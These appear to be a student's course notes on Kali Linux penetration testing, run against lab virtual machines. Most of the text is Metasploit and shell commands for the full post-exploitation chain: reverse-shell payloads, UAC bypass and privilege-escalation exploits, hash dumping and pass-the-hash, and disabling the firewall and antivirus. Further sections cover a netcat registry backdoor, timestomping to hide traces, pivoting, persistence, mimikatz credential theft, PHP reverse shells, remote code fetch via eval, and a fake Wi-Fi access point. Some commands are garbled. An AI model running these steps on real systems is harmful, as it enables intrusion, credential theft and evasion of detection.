This article records the detailed process of learning and using Kali Linux 2018.1 and penetration testing. The tutorial is the course "Kali Linux Penetration Testing" in the Security Niu Classroom
1. Preparations
Expand your results after gaining control of the target system
- escalation of rights
- collect message
- Infiltrate the intranet
- permanent backdoor
Expand your results based on existing sessions
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
Kali monitor
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 10.0.0.128 msf exploit(multi/handler) > exploit -j
Windows system executes payload.exe
kali into metepreter
msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132) msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132) msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN7-VM\John
2. Obtain system account permissions
Privilege escalation failed, usually due to UAC restrictions
meterpreter > getuid Server username: WIN7-VM\John meterpreter > load priv [-] The 'priv' extension has already been loaded. meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin) meterpreter > background
Bypass UAC restrictions
use exploit/windows/local/ask
use exploit/windows/local/ask set payload windows/meterpreter/reverse_tcp use exploit/windows/local/ask set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 set FILENAME win_update.exe set SESSION 1 exploit
meterpreter > getsystem meterpreter > getuid
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac set SESSION 1 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 show targets exploit
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_injection set SESSION 1 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit
Exploit the vulnerability to directly escalate the privilege to the system
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_053_schlamperei set SESSION 1
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_081_track_popup_menu set SESSION 1 exploit
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ms13_097_ie_registry_symlink set SESSION 1 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 set SRVHOST 10.0.0.128 exploit
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ppr_flatten_rec set SESSION 1 exploit
Graphical payload
set payload windows/vncinject/reverse_tcp
use exploit/windows/local/ppr_flatten_rec set payload windows/vncinject/reverse_tcp set SESSION 1 set LHOST 10.0.0.128 set ViewOnly false exploit
Turn off the UAC function
get hashdump
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
try to exploit
use exploit/windows/smb/psexec set RHOST 10.0.0.132 set SMBUser John set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit
Error: Exploit failed [no-access]
UAC needs to be turned off early
sessions -i 2 shell cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f shutdown -r -t 0
reuse
use exploit/windows/smb/psexec set RHOST 10.0.0.132 set SMBUser John set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.128 exploit
4. Basic operations
1. Turn off the firewall
Requires administrator or system privileges
netsh advfirewall set allprofiles state on netsh advfirewall set allprofiles state off
2. Close windefend
View service name
turn off firewall
net stop windefend
3. Bitlocker encryption
- manage-bde -off C:
- manage-bde -status C:
4. Turn off DEP
- bcdedit.exe /set {current} nx AlwaysOff
5 Kill antivirus software
- run killav
- run post / windows / manage / killav
6. Enable Remote Desktop Services
# 开启服务
run post/windows/manage/enable_rdp
# 关闭服务
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
# 开启服务
run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
7. View Remote Desktop
- screenshot
- use spy
- screengrab
5. Attacking Domain Controllers Using Tokens
-tokens
- Temporary tokens bound to the account each time the user logs in
- Submit tokens for authentication when accessing resources, similar to web cookies
- delegate tokens: interactive login sessions
- impersonate tokens: non-interactive login sessions
- delegate tokens change after account logout For Impersonate Token, the permissions are still valid
Incognito
- Standalone software, integrated in meteorreter by msf
- No password or crack or get password hash, steal tokens and disguise yourself as another user
- Especially suitable for privilege escalation and penetration of multiple operating systems in a domain environment
Build a domain environment
- DC + XP
load incognito
- list_tokens -u
- impersonate_token lab\administrator
- Running the above command requires getsystem
- Local ordinary permissions users need local permissions first
- use exploit/windows/local/ms10_015_kitrap0d
- execute -f cmd.exe -i -t # -t: execute the program using the current fake tokens
- shell
8. Registry
The registry holds almost all configuration parameters of windows
- Improper modification can directly cause the system to crash
- Make a full backup of the registry before modifying
- Some registry modifications are irreversible
common use
- Modify and add startup items
- Steal confidential information stored in the registry
- Bypassing file-based virus detection
Add nc backdoor service (metepreter) with registry
- meterpreter >
- upload /usr/share/windows-binaries/nc.exe C:\windows\system32
- reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
- reg setval -k HKLM \ software \ microsoft \ windows \ currentversion \ run -v nc -d 'C: \ windows \ system32 \ nc.exe -Ldp 444 -e cmd.exe'
- reg queryval -k HKLM \ software \ microsoft \ windows \ currentversion \ Run -v nc
Open firewall ports (metepreter)
- meterpreter >
- execute -f cmd -i -H
- netsh firewall show opmode
- netsh firewall add portopening TCP 4444 “test” ENABLE ALL
- shutdown -r -f -t 0
- nc 10.0.0.132 444
Other registry keys
9. Packet capture
- Packet capture (metepreter)
- load sniffer
- sniffer_interfaces
- sniffer_start 2
- sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
- Circularly store captured packets (50000 packets) in a buffer block in memory, without writing to hard disk
- Intelligently filter metepreter traffic, and use SSL/TLS encryption for the full name of transmission
- decoding
- use auxiliary/sniffer/psnuffle
- set PCAPFILE /root/1.cap
10. Search files
- search -f *.ini
- search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx
11. Cracking weak passwords
- John the Ripper cracks weak passwords
– use post/windows/gather/hashdump # system permission metepreter
- run # results are saved in /tmp directory
- use auxiliary/analyze/jtr_crack_fast
- run
12. Erasing traces
- File system access leaves traces. Electronic forensics focus
- Penetration tests and attackers often want to destroy traces of file system access
The best way to avoid detection by forensics: don't touch the file system
- The innate advantage of metepreter (completely based on memory)
MAC 时间 (Modified / Accessed / Changed)
- ls -l –time=atime/mtime/ctime 1.txt
- stat 1.txt
- touch -d “2 days ago” 1.txt
- touch -t 1501010101 1.txt
MACE : MFT entry
- MFT: Master File Table for NTFS file system
- Usually 1024 bytes or 2 hard disk sectors, which store multiple entry information
- Contains file lots of information (size name directory location disk location creation date)
- For more information, study file system forensic analysis techniques
Timestomp (meterpreter)
- timestomp -v 1.txt
- timestomp -fc:\autoexec.bat 1.txt
-b -r # Erase MACE time information, currently this parameter function is invalid - -m / -a / -c / -e / -z
- timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt
13. pivoting springboard / pivot / fulcrum
- msfvenom production payload
msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = kali_firewall LPORT = 4444 -b “\ x00 \ xff” -e x86 / shikata_ga_nai -f exe -o payload.exe Get system permissions
Use an already controlled computer as a springboard for intrusion into the intranet
- From the point of view of other intranet computers, the access all comes from the springboard
run autoroute -s 1.1.1.0/24 # Intranet segment of the attacked target that cannot access the external network
Automatic routing of real-world scenarios
- Use win7 to attack the internal network XP (compare xp with or without access to the external network)
– scan the internal network: use auxiliary/scanner/portscan/tcp
- Use win7 to attack the internal network XP (compare xp with or without access to the external network)
Port forwarding portfwd for Pivoting
- Use already controlled computer to realize port forwarding between kali and attack target
- portfwd add -L LIP -l LPORT -r RIP -p RPORT
- portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
- portfwd list / delete / flush
use exploit/windows/smb/ms08_067_netapi
- set RHOST 127.0.0.1
- set LHOST 2.1.1.10
- use exploit/multi/handler
- set exitonsession false
14. POST module
- meterpreter >
- run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
- run post/windows/gather/checkvm
- run post/windows/gather/credentials/credential_collector
- run post/windows/gather/enum_applications
- run post/windows/gather/enum_logged_on_users
- run post/windows/gather/enum_snmp
- run post/windows/manage/delete_user USERNAME=yuanfh
- run post/multi/recon/local_exploit_suggester
- run post/multi/gather/env
- run post/multi/gather/firefox_creds
- run post/multi/gather/ssh_creds
- run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
- run hostsedit -e 1.1.1.1, www.baidu.com
- migrate -N explorer.exe
- run [tab] [tab]
run winenum
Automate meteor script execution
- set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
- set InitialAutoRunScript checkvm
Automatically execute the post module
- set InitialAutoRunScript migrate -n explorer.exe
- set AutoRunScript post/windows/gather/dumplinks
15. Persistent backdoors
- In the running memory of meteorreter obtained by exploiting the vulnerability, restarting fails
- Repeated exploits may crash services
Persistent backdoor guarantees remote control after bug is fixed
metepreter backdoor
- run metsvc -A # Exclusion -r
- use exploit/multi/handler
- set PAYLOAD windows/metsvc_bind_tcp
- set LPORT 31337
- set LIST 1.1.1.1
persistent backdoor
- run persistence -h
- run persistence -X -i 10 -p 4444 -r 10.0.0.128
- run persistence -U -i 20 -p 4444 -r 10.0.0.128
- run persistence -S -i 20 -p 4444 -r 10.0.0.128
16. mimikatz of msf extension usage
- hashdump uses part of the functionality of mimikatz
- getsystem
- load mimikatz
- wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
- mimikatz_command -h
- mimikatz_command -f a::
- mimikatz_command -f samdump::hashes
- mimikatz_command -f handle::list
- mimikatz_command -f service::list
- mimikatz_command -f crypto::listProviders
- mimikatz_command -f winmine::infos # minesweeper game
17. Code Execution Vulnerabilities
PHP shell
- msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
- msf start listening
- Upload to web site and access via browser
web Delivery
- Exploiting a Code Execution Vulnerability to Access an Attacker's Server
- use exploit/multi/script/web_delivery
- set target 1
- run
- php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”
18. RFI remote file contains
- vi /etc/php5/cgi/php.ini
- allow_url_fopen = On
- allow_url_include = On
- use exploit/unix/webapp/php_include
- set LIST 1.1.1.2
- set PATH /dvwa/vulnerabilities/fi/
- set PHPURI /?page=XXpathXX
- set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
- set payload php/meterpreter/reverse_tcp
- set lhost 1.1.1.1
- exploit
18. Karmetasploit
- Forging AP, sniffing password, receiving data, browser attack
Multi-vulnerability resource file: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
Install other dependencies
- gem install activerecord sqlite3-ruby
Infrastructure installation configuration
- apt-get install isc-dhcp-server
- cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1; default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
fake AP
- airmon-ng start wlan0
- airbase -ng -P -C 30 -e “FREE” -v wlan0mon
- ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
- touch /var/lib/dhcp/dhcpd.leases
- dhcpd -cf /etc/dhcp/dhcpd.conf at0
Launch Karmetasploit
- msfconsole -q -r karma.rc_.txt
Allow users to surf the Internet normally
vi karma.rc_.txt
File link: https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg Password: tpc0
remove setg parameter
- Add browser_autopwn2 and other modules
- Check for malicious traffic: auxiliary/vsploit/malware/dns*
Launch Karmetasploit
- msfconsole -q -r karma.rc_.txt
Add routing and firewall rules
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE